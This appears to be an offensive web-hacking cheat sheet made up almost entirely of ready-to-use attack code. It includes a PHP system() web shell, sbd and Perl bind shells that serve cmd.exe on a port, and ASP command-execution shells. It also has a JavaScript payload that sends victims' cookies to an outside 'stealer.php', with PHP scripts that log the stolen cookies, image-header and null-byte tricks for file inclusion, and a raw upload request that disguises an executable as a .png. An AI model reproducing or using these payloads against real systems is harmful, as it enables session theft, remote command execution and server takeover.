Image inclusionphp (serverside - local/remote)
- will parse comments in jpegs during file inclusions/requires
IE (clientside - local)
- will parse files contents of images
PNG Headers\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <=png Header
\x00\x00\x00\x0d <= Chunksize
\x77\x6f\x6f\x74 <= Chunkid "Woot"
\x00\x00\x00\x01 <= Height
\x00\x00\x00\x01 <= Width
Comment writers for jpegsedjpgcom
Basic php shell<?php
ob_clean();
system("[command]");
die();
?>
Using EchoFor windows:
echo: ^(carrots) are the escape sequence for systemIO redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext
unix:
write lol from echo with hex (no newline) to file
echo -en "\x6c\x6f\x6c" > file.ext
SBD (netcat style):File Recieving
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"
although plink -raw and telnet are not as good they can work.
Play with CookiesSimple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>
Cookie View
Javascript:alert(document.cookie);
Manipulate Cookie
Javascript:void(document.cookie=“variable=value”);
stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Other stealers
<?php // line 1
$cookie = $_GET["c"]; // line 2
$file = fopen('000.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
global $Redirect;
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");
echo "<script>window.location.replace('".$Redirect."')</script>";
?>
Perl shell #!/usr/bin/perl
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
ASP Quicky whoami ?<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>
ASP Shell - WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>
Curl into older PHP servers from chroot skeletons.<?php
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
print_r(curl_getinfo($ch));
$file=curl_exec($ch);
$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;
print $data;
?>
Null BytesPHP garbage
The null byte is represented with '%00' in php
C:\c99.php%00.jpg
CGI null byte stuff too..
see... php null byte
ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------
AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain
-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"
Upload
-----------------------------AAAAAAAAAAAAA